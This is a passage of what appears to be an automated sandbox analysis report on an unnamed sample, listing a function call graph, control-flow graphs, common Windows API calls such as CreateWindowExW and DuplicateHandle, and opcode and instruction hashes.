16482 2a99648 4 API calls 16481->16482 16483 2a9b65f 16481->16483 16482->16483 16483->16431 16485 2a9964d 16484->16485 16487 2a9c358 16485->16487 16488 2a9bf18 16485->16488 16487->16487 16489 2a9bf23 16488->16489 16490 2a95874 4 API calls 16489->16490 16491 2a9c3c7 16489->16491 16490->16491 16495 2a9e138 16491->16495 16503 2a9e150 16491->16503 16492 2a9c400 16492->16487 16496 2a9e150 16495->16496 16498 2a9e18d 16496->16498 16501 2a9e5c1 LoadLibraryExW GetModuleHandleW 16496->16501 16502 2a9e5d0 LoadLibraryExW GetModuleHandleW 16496->16502 16497 2a9e1cd 16499 2a9ef98 CreateWindowExW 16497->16499 16500 2a9ef8a CreateWindowExW 16497->16500 16498->16492 16499->16498 16500->16498 16501->16497 16502->16497 16506 2a9e181 16503->16506 16507 2a9e272 16503->16507 16504 2a9e18d 16504->16492 16505 2a9e1cd 16508 2a9ef98 CreateWindowExW 16505->16508 16509 2a9ef8a CreateWindowExW 16505->16509 16506->16504 16510 2a9e5c1 LoadLibraryExW GetModuleHandleW 16506->16510 16511 2a9e5d0 LoadLibraryExW GetModuleHandleW 16506->16511 16507->16492 16508->16507 16509->16507 16510->16505 16511->16505 16512 2a9b730 16513 2a9b796 16512->16513 16517 2a9b8e0 16513->16517 16520 2a9b8f0 16513->16520 16514 2a9b845 16523 2a996d0 16517->16523 16521 2a9b91e 16520->16521 16522 2a996d0 DuplicateHandle 16520->16522 16521->16514 16522->16521 16524 2a9b958 DuplicateHandle 16523->16524 16526 2a9b91e 16524->16526 16526->16514

                                                  Executed Functions

                                                  Function 02A9DC88 Relevance: 1.7, APIs: 1, Instructions: 235COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 2a9dc88-2a9dc9c 2 2a9dcfc 0->2 3 2a9dc9e-2a9dcac 0->3 4 2a9dd5c-2a9dd5e 2->4 5 2a9dcfe-2a9fdfe 2->5 6 2a9dd0c-2a9dd18 3->6 7 2a9dcae-2a9f9a2 3->7 9 2a9dd49-2a9dd4c 4->9 10 2a9dd60-2a9dd6f 4->10 12 2a9fe09-2a9fe10 5->12 13 2a9fe00-2a9fe06 5->13 6->9 20 2a9f9ab-2a9f9c8 7->20 21 2a9f9a4-2a9f9aa 7->21 15 2a9ddac 9->15 16 2a9dd4e-2a9dd5b 9->16 25 2a9dda9-2a9ddab 10->25 18 2a9fe1b-2a9fe53 12->18 19 2a9fe12-2a9fe18 12->19 13->12 23 2a9de0c-2a9de12 15->23 24 2a9ddae-2a9ddbe 15->24 16->4 28 2a9fe5b-2a9feba CreateWindowExW 18->28 19->18 21->20 27 2a9de15-2a9de20 23->27 24->25 26 2a9ddc0-2a9ddc7 24->26 25->15 26->27 31 2a9febc-2a9fec2 28->31 32 2a9fec3-2a9fefb 28->32 31->32 36 2a9ff08 32->36 37 2a9fefd-2a9ff00 32->37 38 2a9ff09 36->38 37->36 38->38
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2cd1c6a523da46ba03447f80d327a1a87e56fc64dd0ca03bf4300e9a3337a377
                                                  • Instruction ID: 268dfd71376f2e51dfa2ffc423d2f269f96e06fbc2f839442644a0985c4bd504
                                                  • Opcode Fuzzy Hash: 2cd1c6a523da46ba03447f80d327a1a87e56fc64dd0ca03bf4300e9a3337a377
                                                  • Instruction Fuzzy Hash: 549175B1C043899FDB11CFAAC880ADEBFF5EF59314F25819AE444AB212C7749885CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A99730 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 39 2a99730-2a99738 40 2a99743-2a99745 39->40 41 2a9973e call 2a98184 39->41 42 2a9975b-2a9975f 40->42 43 2a99747 40->43 41->40 44 2a99761-2a9976b 42->44 45 2a99773-2a997b4 42->45 96 2a9974d call 2a999b8 43->96 97 2a9974d call 2a999ab 43->97 44->45 50 2a997c1-2a997cf 45->50 51 2a997b6-2a997be 45->51 46 2a99753-2a99755 46->42 47 2a99890-2a998fe 46->47 87 2a99907-2a9990d 47->87 53 2a997d1-2a997d6 50->53 54 2a997f3-2a997f5 50->54 51->50 56 2a997d8-2a997df call 2a98190 53->56 57 2a997e1 53->57 55 2a997f8-2a997ff 54->55 58 2a9980c-2a99813 55->58 59 2a99801-2a99809 55->59 60 2a997e3-2a997f1 56->60 57->60 63 2a99820-2a99829 call 2a981a0 58->63 64 2a99815-2a9981d 58->64 59->58 60->55 70 2a9982b-2a99833 63->70 71 2a99836-2a9983b 63->71 64->63 70->71 72 2a99859-2a9985d 71->72 73 2a9983d-2a99844 71->73 94 2a99860 call 2a99cc0 72->94 95 2a99860 call 2a99c93 72->95 73->72 75 2a99846-2a99856 call 2a9931c call 2a9932c 73->75 75->72 76 2a99863-2a99866 78 2a99889-2a9988f 76->78 79 2a99868-2a99886 76->79 79->78 87->87 88 2a9990f-2a99950 87->88 89 2a99958-2a99983 GetModuleHandleW 88->89 90 2a99952-2a99955 88->90 91 2a9998c-2a999a0 89->91 92 2a99985-2a9998b 89->92 90->89 92->91 94->76 95->76 96->46 97->46
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A99976
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: ea7e3d1af471bee36edced2ef5e954f3305796711ef17822976b1c3c71c3b137
                                                  • Instruction ID: e5d1fef1a2d605dffb917b7dc9edf2e4e4a8adf03abb28ac15ae810d1f4879d0
                                                  • Opcode Fuzzy Hash: ea7e3d1af471bee36edced2ef5e954f3305796711ef17822976b1c3c71c3b137
                                                  • Instruction Fuzzy Hash: 447113B0A00B069FDB64DF6AD18075BBBF1BF88304F10892ED45ADBA50DB75E9058F91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A9DCE8 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 98 2a9dce8-2a9dcfc 101 2a9dd5c-2a9dd5e 98->101 102 2a9dcfe-2a9fdfe 98->102 104 2a9dd49-2a9dd4c 101->104 105 2a9dd60-2a9dd6f 101->105 106 2a9fe09-2a9fe10 102->106 107 2a9fe00-2a9fe06 102->107 108 2a9ddac 104->108 109 2a9dd4e-2a9dd5b 104->109 115 2a9dda9-2a9ddab 105->115 110 2a9fe1b-2a9fe53 106->110 111 2a9fe12-2a9fe18 106->111 107->106 113 2a9de0c-2a9de12 108->113 114 2a9ddae-2a9ddbe 108->114 109->101 118 2a9fe5b-2a9feba CreateWindowExW 110->118 111->110 117 2a9de15-2a9de20 113->117 114->115 116 2a9ddc0-2a9ddc7 114->116 115->108 116->117 119 2a9febc-2a9fec2 118->119 120 2a9fec3-2a9fefb 118->120 119->120 124 2a9ff08 120->124 125 2a9fefd-2a9ff00 120->125 126 2a9ff09 124->126 125->124 126->126
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A9FEAA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 974b08b9891991a638c7643db2a588c1c54e469d7f684b83b4b162d07d4c4a24
                                                  • Instruction ID: 814415bb7b9e845d2f7ca894875adb7f07528736233079926aee1640efb9eafa
                                                  • Opcode Fuzzy Hash: 974b08b9891991a638c7643db2a588c1c54e469d7f684b83b4b162d07d4c4a24
                                                  • Instruction Fuzzy Hash: 8A51EFB1D003599FDF15CFAAC880ADEBFB5BF49314F24852AE419AB211DB749885CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A9FD8C Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 127 2a9fd8c-2a9fdfe 128 2a9fe09-2a9fe10 127->128 129 2a9fe00-2a9fe06 127->129 130 2a9fe1b-2a9fe53 128->130 131 2a9fe12-2a9fe18 128->131 129->128 132 2a9fe5b-2a9feba CreateWindowExW 130->132 131->130 133 2a9febc-2a9fec2 132->133 134 2a9fec3-2a9fefb 132->134 133->134 138 2a9ff08 134->138 139 2a9fefd-2a9ff00 134->139 140 2a9ff09 138->140 139->138 140->140
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A9FEAA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: fd2b699670bfe271d41735002e9a29cfeacbe4f1868d410f724cd368225d1995
                                                  • Instruction ID: 9fc513a4ed960b1487bdd9da5430b69eebdab31423b863f2757ba2db1b40371c
                                                  • Opcode Fuzzy Hash: fd2b699670bfe271d41735002e9a29cfeacbe4f1868d410f724cd368225d1995
                                                  • Instruction Fuzzy Hash: B851B0B1D003199FDF14CFAAC884ADEBBB5BF48314F64822AE419AB650D7749946CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A9DD04 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 141 2a9dd04-2a9fdfe 143 2a9fe09-2a9fe10 141->143 144 2a9fe00-2a9fe06 141->144 145 2a9fe1b-2a9feba CreateWindowExW 143->145 146 2a9fe12-2a9fe18 143->146 144->143 148 2a9febc-2a9fec2 145->148 149 2a9fec3-2a9fefb 145->149 146->145 148->149 153 2a9ff08 149->153 154 2a9fefd-2a9ff00 149->154 155 2a9ff09 153->155 154->153 155->155
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A9FEAA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 97d2dd7fda87199f812db6bb38c83fe70a3fbff1b80fc6c8e1a338028a289399
                                                  • Instruction ID: 21e5ea12d16870aeb5cf2027ea9c43702c82ca2622cfbecad55ff24ff9b0ad26
                                                  • Opcode Fuzzy Hash: 97d2dd7fda87199f812db6bb38c83fe70a3fbff1b80fc6c8e1a338028a289399
                                                  • Instruction Fuzzy Hash: 1851AFB1D003199FDF14CFAAD884ADEBBF5BF48314F24812AE819AB650D7749985CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A95364 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 156 2a95364-2a95431 CreateActCtxA 158 2a9543a-2a95494 156->158 159 2a95433-2a95439 156->159 166 2a954a3-2a954a7 158->166 167 2a95496-2a95499 158->167 159->158 168 2a954a9-2a954b5 166->168 169 2a954b8 166->169 167->166 168->169 171 2a954b9 169->171 171->171
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02A95421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 41af21e9c69b5ada602f38cd8169aaf3e58889d5b688076ffbfc90960d1a5452
                                                  • Instruction ID: fd79f8c15c035fc911b4d46a45534b40054cdf8b64819b13114f71904ad411f2
                                                  • Opcode Fuzzy Hash: 41af21e9c69b5ada602f38cd8169aaf3e58889d5b688076ffbfc90960d1a5452
                                                  • Instruction Fuzzy Hash: 9641D2B1C00619CFDB24DFAAC885B8EBBF2BF59314F608069D408BB250DB755946CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A938A8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 172 2a938a8-2a95431 CreateActCtxA 175 2a9543a-2a95494 172->175 176 2a95433-2a95439 172->176 183 2a954a3-2a954a7 175->183 184 2a95496-2a95499 175->184 176->175 185 2a954a9-2a954b5 183->185 186 2a954b8 183->186 184->183 185->186 188 2a954b9 186->188 188->188
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 02A95421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 74928f421725fd9e62bf332eec7eeb34c39c932e264e98e124445f686bb17478
                                                  • Instruction ID: 8733b7b697856481cbb680fdc68a87dd280e057aa9c75ca5a5598d604587caad
                                                  • Opcode Fuzzy Hash: 74928f421725fd9e62bf332eec7eeb34c39c932e264e98e124445f686bb17478
                                                  • Instruction Fuzzy Hash: 3541D271C00618CBDF24DFAAC885B8EBBF6BF59314F608059D408BB250DBB56946CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A9BA17 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 189 2a9ba17-2a9ba20 190 2a9ba22-2a9bb46 189->190 191 2a9b9c4-2a9b9ec DuplicateHandle 189->191 192 2a9b9ee-2a9b9f4 191->192 193 2a9b9f5-2a9ba12 191->193 192->193
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A9B91E,?,?,?,?,?), ref: 02A9B9DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: f2d8902fdf2e630339f0cfa6a98e50bd6880dc4c4394c86d854e198689205571
                                                  • Instruction ID: 40a2f8fe2de5f24d95a4e1c75237e64861fa12536f160b457cf46e7bb7185a24
                                                  • Opcode Fuzzy Hash: f2d8902fdf2e630339f0cfa6a98e50bd6880dc4c4394c86d854e198689205571
                                                  • Instruction Fuzzy Hash: F5417C78A803459FE7159F60F588B697BB5FBA9308F10892AE905CF785CB780D50CB20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A996D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 207 2a996d0-2a9b9ec DuplicateHandle 210 2a9b9ee-2a9b9f4 207->210 211 2a9b9f5-2a9ba12 207->211 210->211
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A9B91E,?,?,?,?,?), ref: 02A9B9DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 1f8913f37ed404fdc4d4b9010e399bee605dafb3ad76a46c48220d80dc0cc5b9
                                                  • Instruction ID: 8b78462766b007686c3003ba6dd2e5d68ec50268649577cdf62031571c2f5e4e
                                                  • Opcode Fuzzy Hash: 1f8913f37ed404fdc4d4b9010e399bee605dafb3ad76a46c48220d80dc0cc5b9
                                                  • Instruction Fuzzy Hash: E72116B59002199FDF10CF9AD584ADEBFF8EB58324F14845AE914B7310D374A944CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A9B952 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 214 2a9b952-2a9b9c3 215 2a9b9c4-2a9b9ec DuplicateHandle 214->215 216 2a9b9ee-2a9b9f4 215->216 217 2a9b9f5-2a9ba12 215->217 216->217
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A9B91E,?,?,?,?,?), ref: 02A9B9DF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 4a4e6f3a34b2225cd90ab1bdb049ce3c52df3cbe90c781ce0dc3032d5b7f8bce
                                                  • Instruction ID: fcef65b0c1388994ca14e33d7ec1d131e88bb0e8d2abad86a5c1699f41ede5da
                                                  • Opcode Fuzzy Hash: 4a4e6f3a34b2225cd90ab1bdb049ce3c52df3cbe90c781ce0dc3032d5b7f8bce
                                                  • Instruction Fuzzy Hash: 0021E0B5900259DFDB10CFAAD984ADEBBF8EB48324F14841AE954B7310D378A944CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A99348 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 220 2a99348-2a99bd8 222 2a99bda-2a99bdd 220->222 223 2a99be0-2a99c0f LoadLibraryExW 220->223 222->223 224 2a99c18-2a99c35 223->224 225 2a99c11-2a99c17 223->225 225->224
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A999F1,00000800,00000000,00000000), ref: 02A99C02
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: d0980ac7a2e6148755bda645a2bb0a967b377befdd4b38fc4beb72c966a74741
                                                  • Instruction ID: 83be736d3b6f2068787d192c06b18ec64803d8d599afbed1f8a63fcfc5efe2dc
                                                  • Opcode Fuzzy Hash: d0980ac7a2e6148755bda645a2bb0a967b377befdd4b38fc4beb72c966a74741
                                                  • Instruction Fuzzy Hash: F01103B69042099FDB10CF9AC484ADFFBF8EB58324F10842EE519B7600C778A945CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A99B92 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 228 2a99b92-2a99bd8 229 2a99bda-2a99bdd 228->229 230 2a99be0-2a99c0f LoadLibraryExW 228->230 229->230 231 2a99c18-2a99c35 230->231 232 2a99c11-2a99c17 230->232 232->231
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02A999F1,00000800,00000000,00000000), ref: 02A99C02
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 371cede50f644fa56a7d5d115318e7de408ce00a622639486008cd878da81076
                                                  • Instruction ID: e8bddcc9be016731587672be3459a1a32ce5783117d2d21f19fab899320e4cb4
                                                  • Opcode Fuzzy Hash: 371cede50f644fa56a7d5d115318e7de408ce00a622639486008cd878da81076
                                                  • Instruction Fuzzy Hash: 111103B6D042099FCB10CF9AD484ADFFBF4AB58324F10842EE459A7610C778A545CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A99910 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 235 2a99910-2a99950 236 2a99958-2a99983 GetModuleHandleW 235->236 237 2a99952-2a99955 235->237 238 2a9998c-2a999a0 236->238 239 2a99985-2a9998b 236->239 237->236 239->238
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A99976
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 32f2f00681daa03b79ffccafb9114ddce0694ef92f728928b7c63ebf84593c87
                                                  • Instruction ID: abde8d6ec456197870d723f35c2a2078dd4c909a41ae20b0caec718a4c13df63
                                                  • Opcode Fuzzy Hash: 32f2f00681daa03b79ffccafb9114ddce0694ef92f728928b7c63ebf84593c87
                                                  • Instruction Fuzzy Hash: 2D1102B5C002498FDB10CF9AC484ADFFBF4AF88324F10851AD469B7610D778A545CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 072F1980 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92fe478ee6f9716262ddeb63b1ddeafe31e56e9f8e7128634630acc53e6b9f3c
                                                  • Instruction ID: d22a65562848eb9fb5e52a72cedba642ebfeba8254bd69cf989b968a38e0599f
                                                  • Opcode Fuzzy Hash: 92fe478ee6f9716262ddeb63b1ddeafe31e56e9f8e7128634630acc53e6b9f3c
                                                  • Instruction Fuzzy Hash: BF2137B8310A06CFC364CF29C984A16B7F6FF88210741862AE55ACB7A0DB70FC11CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 072F1970 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f34dd429b3c95b9e57f899613836a58681e0a8219b15a3cf4bf4b715ed18ea9
                                                  • Instruction ID: 4c8f07f638609bf5ccca7df1ac1aaffc900b24958c209b26e9c492def7edaded
                                                  • Opcode Fuzzy Hash: 2f34dd429b3c95b9e57f899613836a58681e0a8219b15a3cf4bf4b715ed18ea9
                                                  • Instruction Fuzzy Hash: 0B2138B4210A06DFC365CF28CA84A11B7F5FF49210741866AE59ACBBA1DB30EC51CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 072F1030 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1198f3297e7591a3d722fcab0df265ba4e852541fc97861aa1ebac08f933c01c
                                                  • Instruction ID: 6b5fc7b3953caf7ea251e4a2b7fb2d96e7b3090c4df04ad548715f10c74f74cf
                                                  • Opcode Fuzzy Hash: 1198f3297e7591a3d722fcab0df265ba4e852541fc97861aa1ebac08f933c01c
                                                  • Instruction Fuzzy Hash: 2A1167B0E1120ACFCB18DFA9C048AAEF7F1AF48310F5484B9D518AB321D7399902CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 072F0870 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1099d86e398b19960d1aa736656e26438a9201fdf32c258b02c4cf4e555de08
                                                  • Instruction ID: 9a2e1342cd203c0650feb4df7cef1c560d6b3ce530665658f490ca2865b86ba6
                                                  • Opcode Fuzzy Hash: b1099d86e398b19960d1aa736656e26438a9201fdf32c258b02c4cf4e555de08
                                                  • Instruction Fuzzy Hash: 6B1170B0D092999FDB129FB499297BDBFB0EF02301F0984EAD498E7193C7344A05DB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 072F187F Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d134be4cb7e57f2a27ca59cc9af16e1ff92a1aeacb98afcfe4ff1e4a1a07cdc3
                                                  • Instruction ID: b4aae30f67f850d799794dfce1c186fda4f72044db258f55db42004f535facdc
                                                  • Opcode Fuzzy Hash: d134be4cb7e57f2a27ca59cc9af16e1ff92a1aeacb98afcfe4ff1e4a1a07cdc3
                                                  • Instruction Fuzzy Hash: 762159B1E1125ACFCB1ADF68C044AAAFBF1AF49210F5884A9C454AB362D7359942CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 072F0880 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cad01e8c8629345ed97cfada5c5b91f09f6248bdc7f577c96b669186112e1b7
                                                  • Instruction ID: ede1011f9f7d6c62d48875b10e1a97c4ed186e6f05030574609fb3803af0241c
                                                  • Opcode Fuzzy Hash: 5cad01e8c8629345ed97cfada5c5b91f09f6248bdc7f577c96b669186112e1b7
                                                  • Instruction Fuzzy Hash: A80104B0D15219DFCB14DFA6D8187BEFBF0EB06301F0484AAD468A3292D7784A44DF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 072F08FC Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
